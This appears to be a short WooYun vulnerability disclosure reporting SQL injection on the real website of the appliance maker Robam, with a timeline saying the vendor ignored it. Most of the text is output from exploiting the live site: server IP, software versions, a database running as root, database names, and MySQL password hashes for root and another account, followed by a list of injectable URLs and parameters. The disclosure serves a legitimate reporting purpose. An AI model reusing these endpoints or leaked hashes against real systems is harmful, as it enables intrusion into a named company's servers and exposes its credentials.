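2015-05-01: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly
2015-06-15: The vendor has actively ignored the vulnerability; details are disclosed to the public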
sql
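WooYun: Robam (老板电器) main site SQL injection, all information compromised
I was bored and browsing vulnerabilities on WooYun, looking at the earlier publicly disclosed ones.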
Target: http://m.robam.com/2c1.php?classid=1
Host IP: 183.129.129.77
Web Server: Apache/2.4.4 (Win32) PHP/5.4.16
Powered-by: PHP/5.4.16
DB Server: MySQL
Resp. Time(avg): 805 ms
Current User: root@localhost
Sql Version: 5.6.12
Current DB: dbrobamcom
System User: root@localhost
Host Name: USER-T5K83SCQC5
Installation dir: E:/Program Files/MySQL/MySQL Server 5.6/
DB User & Pass:
    root:*AFE1E4B2058678DBCF19B7C9CF60C78D79B6A971:localhost
    root:*AFE1E4B2058678DBCF19B7C9CF60C78D79B6A971:127.0.0.1
    root:*AFE1E4B2058678DBCF19B7C9CF60C78D79B6A971:
    sql:*86803CE6E3FB0482F55E703D0A87A2059FE1B5F8:%
Data Bases: information_schema bonyee dbrobamcom mysql performance_schema robam_activity robam_rec robamse robamweb sakila test world
http://m.robam.com/2c1.php?classid=1
http://www.robam.com/Search/search.html title=1 (POST SQL injection exists)
http://m.robam.com/2c2.php?id=17
http://m.robam.com/9job_1.php?id=5
http://m.robam.com/searchresult.php keyword=1 (POST SQL injection exists)
Filter the input!
Unable to contact the vendor, or the vendor actively refused